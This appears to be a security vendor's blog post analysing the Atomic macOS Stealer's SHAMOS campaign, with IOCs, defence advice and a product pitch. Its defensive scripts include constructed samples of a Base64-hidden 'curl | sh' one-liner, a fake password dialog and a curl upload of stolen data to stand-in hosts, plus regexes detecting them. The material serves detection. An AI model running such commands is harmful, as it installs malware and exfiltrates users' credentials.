Atomic macOS Stealer: Inside the One‑Line Mac Malware and How to Stop It

Posted on September 2, 2025

Mac users have long enjoyed a reputation for strong security, but recent attacks are shattering the notion that Macs are immune to malware. One of the latest threats is the Atomic macOS Stealer (AMOS), a sophisticated information-stealing malware that has been actively targeting macOS systems. 

In a campaign between June and August 2025, cybercriminals leveraged malicious ads (malvertising) and fake “Apple Support” pages to trick users into infecting themselves with a new AMOS variant called “SHAMOS”.

This article explores what the Atomic macOS Stealer is, how the SHAMOS campaign works, and, most importantly, how you can protect against this stealthy Mac malware.

What is Atomic macOS Stealer (AMOS)?

Atomic macOS Stealer (often abbreviated AMOS) is a malware-as-a-service infostealer designed specifically for Apple’s macOS. First observed in 2023, AMOS quickly became one of the most notorious Mac malware families.

Operated by a Russia-linked cybercrime group that CrowdStrike tracks as Cookie Spider, AMOS is essentially “rented out” to other cybercriminals, who use it to harvest sensitive data and cryptocurrency from victims. In other words, Cookie Spider provides the malware for a fee, and affiliates deploy it in their own attacks.

What can AMOS steal? Plenty. Once it infects a Mac, AMOS aggressively hunts for valuable personal and financial data. It can siphon off:

  • Keychain passwords and system credentials (giving attackers your saved logins and even Mac account password)
  • Files from the Desktop and Documents folders (which often contain important personal or work documents)
  • Browser data including saved passwords, browser cookies, and auto-fill information
  • Cryptocurrency wallet data from apps like Electrum, Binance, Exodus, Atomic Wallet, Coinomi, and more
  • Apple’s Notes and other local app data, as well as system information that might be useful for further exploitation

In July 2025, security researchers discovered that newer versions of AMOS had added a backdoor capability, meaning the malware can open a hidden remote access channel to persist on the Mac and execute commands later. 

The SHAMOS Campaign: Malvertising Mac Users

In mid-2025, a spike of attacks attributed to Cookie Spider introduced a special variant of AMOS called SHAMOS. Between June and August 2025, over 300 organizations were targeted by this campaign. 

The SHAMOS campaign is a textbook example of how modern attackers use social engineering and malvertising to bypass traditional security:

  1. First, the attackers purchase Google search ads that appear when users search for common Mac help topics. For example, a user Googling something like “how to flush DNS cache on macOS” might see a promoted result at the top that looks like a legitimate tech support page.

     However, the ad links led to fraudulent macOS help websites (with names like mac-safer[.]com or rescue-mac[.]com) that mimicked Apple’s support style.

  2. On the malicious site, the content looks like a normal how-to article for fixing the Mac issue. The page provides a few generic troubleshooting steps. Then, crucially, it instructs the user to run a command in the Terminal app as part of the fix.

     The instructions were presented as if they were an official solution, even including a convenient “copy this command” box.

Figure: A fake “Mac Help” page instructing the user to copy-paste a Terminal command. Source: crowdstrike.com

  3. The Terminal command given was a single-line snippet that, at a glance, looks complex. In truth, this one-liner was malicious and very powerful. The visible part of the command decodes a Base64-encoded string; the decoded text is itself a curl command (curl being a tool to fetch data from the internet), which the shell then runs.

     By doing so, the command fetched a script from a remote server (icloudservers[.]com) and executed it on the user’s Mac, all in one go.

     This “download and execute” one-liner meant the user effectively installed malware on themselves with a single paste into Terminal. The attackers bypassed Apple’s usual app security checks because the user directly invoked the script via Terminal, sidestepping Gatekeeper. (Gatekeeper evaluates apps and files that carry the quarantine attribute set by browsers and other downloaders; it does not inspect what a user types into Terminal, and files fetched with curl never receive the attribute in the first place.)

  4. To hide its intent, the command embedded the download URL in an encoded format (Base64). Once run, the retrieved malicious Bash script did two things:
    1. it prompted for or captured the user’s password, 
    2. and then downloaded the SHAMOS malware payload (a Mach-O binary) from the same attacker server. 

Stealing the user’s password could allow the malware to run with elevated privileges (if the user was tricked into entering their admin password), and also gives attackers a valuable credential (the Mac login password itself).
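The practical defence against this step is to decode the blob and read it before pasting anything. The script below is an added example, not code from the original post or from the CrowdStrike report: it extracts Base64-looking tokens from a command line, decodes them without executing anything, and flags the download-and-execute shape. The wrapper shape of the one-liner (`echo … | base64 -d | sh`) and the example.com URL are assumptions used to build the sample input; the DNS-flush command is the genuine macOS one, included for contrast.

```shell
#!/bin/sh
# Added example (not from the original post or the CrowdStrike report).
# Inspect a "copy this into Terminal" one-liner WITHOUT running it.
# example.com below is a placeholder, not a domain from the campaign.

# --- constructed sample input ----------------------------------------------
# The hidden command, and the same command wrapped the way the fake help
# pages do it: Base64-encoded, decoded at run time, and handed to the shell.
SAMPLE_PAYLOAD='curl -fsSL https://example.com/install.sh | sh'
SAMPLE_ENC=$(printf '%s' "$SAMPLE_PAYLOAD" | base64)
SAMPLE_ONE_LINER="echo $SAMPLE_ENC | base64 -d | sh"

# The real macOS DNS-flush command, for contrast: nothing encoded, no download.
BENIGN_FLUSH='sudo dscacheutil -flushcache; sudo killall -HUP mDNSResponder'

# Print every Base64-looking token in a command line, decoded.
# Never executes anything. Tokens that fail to decode are skipped; a long
# plain word whose length happens to be a multiple of 4 may decode to junk,
# which is harmless here because nothing is run.
decode_embedded_b64() {
  printf '%s\n' "$1" | grep -oE '[A-Za-z0-9+/]{16,}={0,2}' | while read -r tok; do
    if decoded=$(printf '%s' "$tok" | base64 -d 2>/dev/null); then
      printf '%s\n' "$decoded"
    fi
  done
}

# Heuristic: does the visible command, or anything it decodes, fetch a
# remote resource and hand it straight to a shell (curl ... | sh, sh -c "$(curl ...)")?
is_download_and_execute() {
  visible=$1
  hidden=$(decode_embedded_b64 "$visible")
  printf '%s\n%s\n' "$visible" "$hidden" |
    grep -Eq '(curl|wget)[^|]*[|][[:space:]]*(ba|z)?sh([[:space:]]|$)|(ba|z)?sh[[:space:]]+-c.*(curl|wget)'
}

# Demo: show what the one-liner would actually run, then give a verdict.
printf 'Visible command : %s\n' "$SAMPLE_ONE_LINER"
printf 'Decoded payload : %s\n' "$(decode_embedded_b64 "$SAMPLE_ONE_LINER")"
if is_download_and_execute "$SAMPLE_ONE_LINER"; then
  echo 'VERDICT: download-and-execute pattern, do not run'
fi
if ! is_download_and_execute "$BENIGN_FLUSH"; then
  echo 'VERDICT: benign flush command, no remote fetch'
fi
```

Note that the visible one-liner contains no curl at all; only the decoded text does, which is exactly why a user (or a web filter) reading the pasted line sees nothing alarming.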

This malvertising campaign cast a wide net. Victims who clicked these fake help ads were observed in the United States, Canada, the UK, Japan, China, Italy, Colombia, Mexico and more. 

Notably, none were in Russia or neighboring CIS countries. This is likely not a coincidence, as many Russian cybercrime gangs deliberately avoid targeting their home region, partly due to underground “rules” and to avoid local law enforcement attention. 

It’s worth mentioning that this one-line install trick isn’t entirely new. In 2024 and early 2025, other Mac malware, including Cuckoo Stealer and earlier AMOS campaigns distributed through fake Homebrew sites, used a similar method. The success of those campaigns likely encouraged the attackers to reuse the tactic on a broader scale with SHAMOS.

What Happens When SHAMOS Infects a Mac?

Once the user unknowingly executes the Terminal command, the SHAMOS variant of Atomic Stealer gets to work on the Mac. Here’s a breakdown of the attack’s technical payload stage:

The malicious script pulls down the SHAMOS malware file and drops it into the Mac’s temporary directory (/tmp/). It then uses xattr (the extended attributes tool) to strip the file’s extended attributes, including the com.apple.quarantine flag that Gatekeeper uses to decide which downloaded files to inspect. Files fetched with curl normally carry no quarantine flag in the first place, so this is a belt-and-braces step to make sure Gatekeeper never sees the binary; it is also a reliable detection signal, since legitimate installers have no reason to run xattr against files in /tmp.

After that, the script gives the binary execute permissions (chmod +x) and launches it.

Once running, SHAMOS first performs anti-VM and anti-sandbox checks to ensure it’s not being monitored by security researchers in a virtual machine. Assuming the coast is clear, it proceeds to scour the system using built-in tools and AppleScript commands. 

The stealer looks for all kinds of data: 

  • Cryptocurrency wallet files
  • Keychain data
  • Saved passwords
  • Browser profiles
  • Cookies
  • Apple Notes, and any other credentials or personal files it can find.

SHAMOS then packages the collected data into a file, typically a ZIP archive named out.zip, and sends it out of the system using curl (an HTTP upload to the attacker’s server). 

Indicators of Compromise (IOCs)

Domains / URLs (fake Apple support sites, malvertising landing pages, and malicious GitHub repos):

  • mac-safer[.]com
  • rescue-mac[.]com
  • icloudservers[.]com/gm/install.sh
  • icloudservers[.]com/gm/update
  • macostutorial[.]com/iterm2/install.sh
  • macostutorial[.]com/iterm2/update
  • github[.]com/jeryrymoore/Iterm2

SHA-256 hashes (file-based indicators of SHAMOS payloads):

  • 231c4bf14c4145be77aa4fef36c208891d818983c520ba067dda62d3bbf547f
  • eb7ede285aba687661ad13f22f8555aab186debbadf2c116251cb269e913ef68
  • 4549e2599de3011973fde61052a55e5cdb770348876abc82de14c2d99575790f
  • b01c13969075974f555c8c88023f9abf891f72865ce07efbcee6c2d906d410d5
  • a4e47fd76dc8ed8e147ea81765edc32ed1e11cff27d138266e3770c7cf953322
  • 95b97a5da68fcb73c98cd9311c56747545db5260122ddf6fae7b152d3d802877

Artifacts / behaviors (useful for behavioral detection and threat hunting):

  • Malware dropped in the /tmp/ directory
  • Use of xattr to remove quarantine flags
  • Suspicious chmod granting execute permission
  • osascript (AppleScript) activity for reconnaissance and password prompts
  • Creation of com.finder.helper.plist in /Library/LaunchDaemons (persistence)
  • Bundling stolen data into out.zip and sending it via curl
  • Hidden files in the home directory (fake Ledger Live, botnet modules)
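The on-disk artifacts in the table (persistence plist, staged out.zip, executable Mach-O dropped in /tmp) can be triaged with nothing but a shell. The script below is an added example, not code from the original post or from CrowdStrike: it walks a root directory, which lets it be pointed at a mounted disk image as well as a live Mac, and counts the artifacts it finds. The only facts it relies on are the file names from the table and the Mach-O magic numbers; the fixture tree it builds for the demo is constructed data, and the function names are assumptions of the example.

```shell
#!/bin/sh
# Added example, not code from the original post or from CrowdStrike.
# Offline triage for the on-disk SHAMOS artifacts listed in the IOC table.
# Pass a root directory (default /) so a mounted image can be checked too.

# Print one "HIT ..." line per artifact on stderr and the hit count on stdout,
# so callers can use the number directly.
count_stealer_artifacts() {
  root=${1:-/}
  hits=0

  # 1. Persistence item named in the IOC table.
  if [ -e "$root/Library/LaunchDaemons/com.finder.helper.plist" ]; then
    echo "HIT persistence: $root/Library/LaunchDaemons/com.finder.helper.plist" >&2
    hits=$((hits + 1))
  fi

  # 2. Staged exfiltration archive.
  if [ -e "$root/tmp/out.zip" ]; then
    echo "HIT staged archive: $root/tmp/out.zip" >&2
    hits=$((hits + 1))
  fi

  # 3. Executable Mach-O binaries sitting in /tmp (including dotfiles).
  #    The magic is read with od so this works without `file`:
  #    cffaedfe/cefaedfe are 64/32-bit little-endian Mach-O as stored on disk,
  #    feedfacf/feedface the big-endian forms, cafebabe a fat (universal)
  #    binary. Caveat: Java class files also start with cafebabe.
  #    Absence of a quarantine attribute is NOT checked: curl-fetched files
  #    never had one, so it would prove nothing.
  for f in "$root"/tmp/* "$root"/tmp/.[!.]*; do
    [ -f "$f" ] || continue
    magic=$(od -An -tx1 -N4 "$f" 2>/dev/null | tr -d ' \n')
    case "$magic" in
      cffaedfe|cefaedfe|feedfacf|feedface|cafebabe)
        if [ -x "$f" ]; then
          echo "HIT executable Mach-O in tmp: $f" >&2
          hits=$((hits + 1))
        fi ;;
    esac
  done

  echo "$hits"
}

# Build a throwaway fixture tree containing all three artifacts (constructed
# data for the demo; nothing here is a real SHAMOS sample).
make_fixture() {
  fx=$(mktemp -d)
  mkdir -p "$fx/Library/LaunchDaemons" "$fx/tmp"
  printf '<plist/>' > "$fx/Library/LaunchDaemons/com.finder.helper.plist"
  : > "$fx/tmp/out.zip"
  # Fake 64-bit little-endian Mach-O: just the 4 magic bytes, in octal.
  printf '\317\372\355\376' > "$fx/tmp/update"
  chmod 755 "$fx/tmp/update"
  # A harmless text file that must not be flagged.
  printf 'notes\n' > "$fx/tmp/readme.txt"
  echo "$fx"
}

# Demo: run against the fixture, then against an empty tree.
FIXTURE=$(make_fixture)
echo "fixture hits: $(count_stealer_artifacts "$FIXTURE")"
CLEAN=$(mktemp -d); mkdir -p "$CLEAN/tmp"
echo "clean hits:   $(count_stealer_artifacts "$CLEAN")"
```

On a live Mac, run it as `count_stealer_artifacts /`; the hash list in the table is the complementary check (`shasum -a 256` on anything the Mach-O scan reports).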

How to Defend Against Mac Stealers Like AMOS

The rise of AMOS and similar malware is a wake-up call that even macOS can be targeted en masse. Here are some best practices to protect against such threats:

Never run Terminal commands from a website you don’t fully trust.
Legitimate fixes for Mac problems rarely require copying a one-liner from an unknown site, and they never require a command that decodes Base64 text or pipes a download straight into sh or bash. If you’re prompted to do so, seek a second opinion: check official Apple documentation, ask your IT team, or decode the command and read what it does before running anything.

Use ad blockers
Attackers are bidding on common search keywords to push malicious sites to the top. Using a reputable ad-blocker or an anti-malvertising browser extension can help reduce the chance of landing on a fake site. 

Don’t use an admin account for everyday work
Whenever possible, avoid using an admin account for day-to-day activities on your Mac. If you run as a standard user and mistakenly run a malicious command, anything that needs root (installing a LaunchDaemon, for example) has to prompt for an admin password.

That extra step can alert you that something’s off (if a “fix” for clearing a cache asks for your password, be suspicious). Be clear about the limit of this control, though: a stealer running as the standard user can still read that user’s browser profiles, Documents folder and other unprivileged data, and can still pop a fake password dialog via osascript, so a standard account reduces the blast radius but does not by itself prevent credential theft.

Endpoint security and monitoring
Enterprise environments need a modern Endpoint Detection & Response (EDR) or anti-malware solution on Macs. Good security software can catch malicious behaviors, such as unknown processes trying to access sensitive files or scripts using curl to exfiltrate data.
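The behaviors in the IOC table translate directly into detection rules over process telemetry. The script below is an added example, not code from the original post or from any EDR vendor: it runs a small rule set over constructed process-event lines in a made-up key=value format (real EDR or macOS Endpoint Security telemetry will need its own field mapping), flags the xattr/chmod/osascript/curl-upload/LaunchDaemon chain, and deliberately leaves a plain download and a chmod outside /tmp unflagged. The example.invalid hostnames and all event lines are constructed sample data.

```shell
#!/bin/sh
# Added example, not from the original post or any EDR product.
# Rule-based detection of the SHAMOS behavior chain over process events.
# Event format (constructed for this demo):
#   <timestamp> pid=<n> ppid=<n> user=<u> exe=<path> args="<command line>"

# Constructed sample telemetry: one infection chain (pids 501-507) followed by
# two benign events (600, 601) that must NOT fire.
sample_events() {
  cat <<'EOF'
2025-08-12T10:01:02Z pid=501 ppid=410 user=alice exe=/bin/sh args="sh -c curl -fsSL https://example.invalid/gm/install.sh | bash"
2025-08-12T10:01:03Z pid=502 ppid=501 user=alice exe=/usr/bin/osascript args="osascript -e display dialog macOS needs your password default answer with hidden answer"
2025-08-12T10:01:04Z pid=503 ppid=501 user=alice exe=/usr/bin/xattr args="xattr -c /tmp/update"
2025-08-12T10:01:05Z pid=504 ppid=501 user=alice exe=/bin/chmod args="chmod +x /tmp/update"
2025-08-12T10:01:06Z pid=505 ppid=501 user=alice exe=/tmp/update args="/tmp/update"
2025-08-12T10:01:40Z pid=506 ppid=505 user=alice exe=/usr/bin/curl args="curl -X POST -F file=@/tmp/out.zip https://example.invalid/gm/upload"
2025-08-12T10:02:00Z pid=507 ppid=505 user=root exe=/bin/cp args="cp /tmp/com.finder.helper.plist /Library/LaunchDaemons/com.finder.helper.plist"
2025-08-12T11:00:00Z pid=600 ppid=410 user=alice exe=/usr/bin/curl args="curl -fsSL -o /tmp/brew.sh https://example.invalid/install.sh"
2025-08-12T11:00:01Z pid=601 ppid=410 user=alice exe=/bin/chmod args="chmod +x /Users/alice/bin/mytool"
EOF
}

# Extract the pid field (whitespace before "pid=" keeps "ppid=" from matching).
pid_of() {
  printf '%s\n' "$1" | sed -n 's/.*[[:space:]]pid=\([0-9]*\).*/\1/p'
}

# check LINE RULE_NAME ERE: print "RULE_NAME pid=N" when the line matches.
check() {
  if printf '%s\n' "$1" | grep -Eq "$3"; then
    printf '%s pid=%s\n' "$2" "$(pid_of "$1")"
  fi
}

# Read events on stdin and emit one alert line per rule hit.
detect_stealer_events() {
  while IFS= read -r line; do
    [ -n "$line" ] || continue
    check "$line" download_and_execute  '(curl|wget)[^|]*[|][[:space:]]*(ba|z)?sh'
    check "$line" quarantine_strip      'xattr[[:space:]]+(-c|-d[[:space:]]+com\.apple\.quarantine)[[:space:]]+/(private/)?tmp/'
    check "$line" chmod_exec_in_tmp     'chmod[[:space:]]+(\+x|[0-7]{3,4})[[:space:]]+/(private/)?tmp/'
    check "$line" exec_from_tmp         'exe=/(private/)?tmp/'
    check "$line" fake_password_dialog  'osascript.*display dialog.*hidden answer'
    check "$line" exfil_upload          'curl.*(-F|--form|-T|--upload-file|--data-binary).*out\.zip'
    check "$line" launchdaemon_persist  '/Library/LaunchDaemons/com\.finder\.helper\.plist'
  done
}

# Number of alert lines produced for the events on stdin.
count_alerts() {
  detect_stealer_events | grep -c . || true
}

# Demo over the constructed events: each hit prints as "rule pid=N".
sample_events | detect_stealer_events
echo "alerts: $(sample_events | count_alerts)"
```

Any single rule here is noisy on its own (developers chmod things in /tmp all day); the value is in correlation, and a practical deployment would raise severity when three or more distinct rules fire under the same parent process within a minute, which is exactly the shape of pids 501 to 507 above.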

Awareness training
Organizations should consider investing in security awareness training, focusing on the human element. The success of AMOS’s one-line scam hinges on social engineering – convincing a user the command is a helpful fix. 

Regularly remind employees of the risks of copying commands from the internet and encourage a culture of “if in doubt, ask IT”.

Finally, consider solutions that look beyond the endpoint for signs of compromise. Not all breaches will be caught in real-time on the device, so an extra safety net is valuable.

Twilight Cyber: Protecting Your Organization from Stealer Attacks

Threats like Atomic macOS Stealer require a proactive, multi-layered defense. One such layer is early breach detection beyond the endpoint. Twilight Cyber’s real-time threat protection is designed to catch what others miss.

Twilight’s platform monitors illicit markets and breach dumps for your organization’s credentials and alerts you when they appear, often within hours of the breach. This early warning can be a game-changer: instead of finding out weeks later (or never) that a Mac in your company was quietly affected by a stealer, you get an alert almost immediately, allowing you to reset accounts, remove malware from the machine, and prevent a larger incident.

Twilight Cyber’s approach requires no installation on the endpoint and complements your existing Mac security. 

To learn more about how Twilight Cyber can help safeguard your organization from infostealers and other emerging threats, contact us or visit our website for a demo. Stay safe!
